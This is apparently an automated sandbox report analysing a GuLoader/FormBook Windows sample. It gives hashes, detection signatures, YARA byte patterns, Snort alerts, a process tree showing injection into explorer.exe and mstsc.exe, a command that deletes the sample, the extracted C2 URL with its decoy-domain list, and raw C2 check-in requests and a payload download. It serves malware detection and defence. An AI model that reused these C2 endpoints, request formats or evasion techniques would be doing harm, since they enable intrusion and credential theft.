Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SC.028UCCP.exe

Overview

General Information

Sample Name:SC.028UCCP.exe
Analysis ID:830301
MD5:3f8f4a7f43b5627ed45128bb99f0b471
SHA1:1c1931fe8db9b5df89d39e3121fa72c2a355ded1
SHA256:0ae741990942bc5b9a51a72dc1cc9f2197b8fe140b76eee9170c3260c00e8656
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect Any.run
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SC.028UCCP.exe (PID: 6716 cmdline: C:\Users\user\Desktop\SC.028UCCP.exe MD5: 3F8F4A7F43B5627ED45128BB99F0B471)
    • SC.028UCCP.exe (PID: 2704 cmdline: C:\Users\user\Desktop\SC.028UCCP.exe MD5: 3F8F4A7F43B5627ED45128BB99F0B471)
      • explorer.exe (PID: 4768 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • mstsc.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: B038F39C887BE2A810E20B08613F3B84)
          • cmd.exe (PID: 2296 cmdline: /c del "C:\Users\user\Desktop\SC.028UCCP.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"C2 list": ["www.eliteequinewellness.com/ms12/"], "decoy": ["familywealthsociety.com", "hypnotherapywashington.com", "top-promotion.net", "tovber.xyz", "guiadestudio.com", "alibabas.international", "campsitecredits.com", "18370327105.com", "yvhome.net", "triknblog.net", "limpiezasturisticas.com", "khaivisuals.com", "amyjohnsonrealtor.com", "websponsorzone.net", "cobblestonemineralslp.com", "women-clothing-64680.com", "houtme.com", "404shadydale.com", "laposadaapts.com", "paparazirestaurant.co.uk", "helios.moe", "kx2662.com", "expatsturkiye.com", "levelhsealth.com", "eeccu.info", "princestrustawards.co.uk", "lingdangcj.com", "goverifyvin.com", "innovapay.africa", "dvxlbw.top", "g20.xn--fiq228c5hs", "fdbezd.top", "findcar.uk", "lordsbury.co.uk", "brainmovementinternational.com", "slysz.com", "thinkdev.africa", "garageautosaintthomas.com", "bhspharmas.com", "likemommy.online", "hospitalityhsia.com", "friendsofquarepianos.co.uk", "chejukongjian.com", "drugtestingservices.co.uk", "abimpianti.ch", "lasvegasestimates.com", "expertprestartupbootcamp.co.uk", "centersuico.com", "consolewars.net", "cafemarita.site", "findyellowfreightjobs.com", "economjchq.space", "everwoodpreserving.net", "lists-cellphones.life", "buckleyassociates.co.uk", "littel-italy.com", "hangrytots.com", "ss777.net", "arborfinancialgroup.info", "hookspatqp.space", "finesttravels.africa", "fullhousemarketer.com", "conscienciaretroprogresiva.com", "arialttnr.com"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.LamJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2969977740.0000000001660000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
          00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 25 entries
          No Sigma rule has matched
          Timestamp:192.168.11.20188.114.97.349822802031449 03/20/23-09:10:34.025355
          SID:2031449
          Source Port:49822
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20142.250.186.5149827802031412 03/20/23-09:11:35.414280
          SID:2031412
          Source Port:49827
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20104.21.39.11449842802031449 03/20/23-09:15:00.044344
          SID:2031449
          Source Port:49842
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20198.185.159.14449830802031412 03/20/23-09:12:15.932254
          SID:2031412
          Source Port:49830
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2013.248.157.3249840802031449 03/20/23-09:14:39.545243
          SID:2031449
          Source Port:49840
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20165.160.15.2049835802031449 03/20/23-09:13:17.988587
          SID:2031449
          Source Port:49835
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20198.185.159.14449830802031453 03/20/23-09:12:15.932254
          SID:2031453
          Source Port:49830
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2081.17.29.14749823802031412 03/20/23-09:10:54.265433
          SID:2031412
          Source Port:49823
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20198.185.159.14449830802031449 03/20/23-09:12:15.932254
          SID:2031449
          Source Port:49830
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20169.60.232.13949844802031449 03/20/23-09:15:33.016841
          SID:2031449
          Source Port:49844
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20142.250.186.5149827802031453 03/20/23-09:11:35.414280
          SID:2031453
          Source Port:49827
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2081.17.29.14749823802031453 03/20/23-09:10:54.265433
          SID:2031453
          Source Port:49823
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20165.160.15.2049835802031412 03/20/23-09:13:17.988587
          SID:2031412
          Source Port:49835
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20104.21.39.11449842802031453 03/20/23-09:15:00.044344
          SID:2031453
          Source Port:49842
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20142.250.186.5149827802031449 03/20/23-09:11:35.414280
          SID:2031449
          Source Port:49827
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20104.21.39.11449842802031412 03/20/23-09:15:00.044344
          SID:2031412
          Source Port:49842
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20165.160.15.2049835802031453 03/20/23-09:13:17.988587
          SID:2031453
          Source Port:49835
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20195.133.40.4649810802018752 03/20/23-09:09:13.434535
          SID:2018752
          Source Port:49810
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20188.114.97.349822802031412 03/20/23-09:10:34.025355
          SID:2031412
          Source Port:49822
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2013.248.157.3249840802031453 03/20/23-09:14:39.545243
          SID:2031453
          Source Port:49840
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20188.114.97.349822802031453 03/20/23-09:10:34.025355
          SID:2031453
          Source Port:49822
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2013.248.157.3249840802031412 03/20/23-09:14:39.545243
          SID:2031412
          Source Port:49840
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20169.60.232.13949844802031453 03/20/23-09:15:33.016841
          SID:2031453
          Source Port:49844
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20169.60.232.13949844802031412 03/20/23-09:15:33.016841
          SID:2031412
          Source Port:49844
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2081.17.29.14749823802031449 03/20/23-09:10:54.265433
          SID:2031449
          Source Port:49823
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: SC.028UCCP.exeVirustotal: Detection: 50%Perma Link
          Source: SC.028UCCP.exeReversingLabs: Detection: 33%
          Source: Yara matchFile source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: 8.2.mstsc.exe.50cf840.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 8.2.mstsc.exe.2f43518.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.explorer.exe.13c7f840.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.eliteequinewellness.com/ms12/"], "decoy": ["familywealthsociety.com", "hypnotherapywashington.com", "top-promotion.net", "tovber.xyz", "guiadestudio.com", "alibabas.international", "campsitecredits.com", "18370327105.com", "yvhome.net", "triknblog.net", "limpiezasturisticas.com", "khaivisuals.com", "amyjohnsonrealtor.com", "websponsorzone.net", "cobblestonemineralslp.com", "women-clothing-64680.com", "houtme.com", "404shadydale.com", "laposadaapts.com", "paparazirestaurant.co.uk", "helios.moe", "kx2662.com", "expatsturkiye.com", "levelhsealth.com", "eeccu.info", "princestrustawards.co.uk", "lingdangcj.com", "goverifyvin.com", "innovapay.africa", "dvxlbw.top", "g20.xn--fiq228c5hs", "fdbezd.top", "findcar.uk", "lordsbury.co.uk", "brainmovementinternational.com", "slysz.com", "thinkdev.africa", "garageautosaintthomas.com", "bhspharmas.com", "likemommy.online", "hospitalityhsia.com", "friendsofquarepianos.co.uk", "chejukongjian.com", "drugtestingservices.co.uk", "abimpianti.ch", "lasvegasestimates.com", "expertprestartupbootcamp.co.uk", "centersuico.com", "consolewars.net", "cafemarita.site", "findyellowfreightjobs.com", "economjchq.space", "everwoodpreserving.net", "lists-cellphones.life", "buckleyassociates.co.uk", "littel-italy.com", "hangrytots.com", "ss777.net", "arborfinancialgroup.info", "hookspatqp.space", "finesttravels.africa", "fullhousemarketer.com", "conscienciaretroprogresiva.com", "arialttnr.com"]}
          Source: SC.028UCCP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: mshtml.pdb source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp
          Source: Binary string: wntdll.pdbUGP source: SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034C75000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034ACC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SC.028UCCP.exe, SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034C75000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034ACC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mstsc.pdbGCTL source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034CB0000.00000040.10000000.00040000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2966799157.000000003517A000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdbUGP source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp
          Source: Binary string: mstsc.pdb source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034CB0000.00000040.10000000.00040000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2966799157.000000003517A000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405E9C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_0040264F FindFirstFileA,

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 165.160.15.20 80
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.207.174 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.185.211 80
          Source: C:\Windows\explorer.exeNetwork Connect: 183.181.96.18 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.187.111.221 80
          Source: C:\Windows\explorer.exeNetwork Connect: 13.248.157.32 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.26.48.101 80
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.147 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.186.51 80
          Source: C:\Windows\explorer.exeNetwork Connect: 169.60.232.139 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.39.114 80
          Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49810 -> 195.133.40.46:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 81.17.29.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 81.17.29.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 81.17.29.147:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 142.250.186.51:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 142.250.186.51:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 142.250.186.51:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49830 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49830 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49830 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49835 -> 165.160.15.20:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49835 -> 165.160.15.20:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49835 -> 165.160.15.20:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 13.248.157.32:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 13.248.157.32:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 13.248.157.32:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 104.21.39.114:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 104.21.39.114:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 104.21.39.114:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 169.60.232.139:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 169.60.232.139:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 169.60.232.139:80
          Source: Malware configuration extractorURLs: www.eliteequinewellness.com/ms12/
          Source: Joe Sandbox ViewASN Name: CSCUS CSCUS
          Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2// HTTP/1.1Host: www.paparazirestaurant.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.eliteequinewellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb HTTP/1.1Host: www.economjchq.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.friendsofquarepianos.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.arialttnr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.garageautosaintthomas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy HTTP/1.1Host: www.hospitalityhsia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.abimpianti.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGT HTTP/1.1Host: www.drugtestingservices.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap HTTP/1.1Host: www.amyjohnsonrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.lists-cellphones.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.findyellowfreightjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.conscienciaretroprogresiva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.triknblog.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.abimpianti.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 165.160.15.20 165.160.15.20
          Source: global trafficHTTP traffic detected: GET /CsPlxqjFa224.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.133.40.46Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:12:57 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 20 Mar 2023 08:15:35 GMTContent-Type: text/htmlContent-Length: 291ETag: "64063330-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
